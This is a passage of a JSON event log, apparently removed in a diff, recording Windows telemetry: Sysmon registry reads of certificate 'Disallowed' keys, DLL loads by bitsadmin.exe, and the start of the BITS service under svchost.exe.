131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 5868, - 
"process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876520000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 
2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876680000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software 
Publishing", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "c:\\windows\\system32\\svchost.exe -k netsvcs -p -s BITS", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 3980, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883570876860016, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570876830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
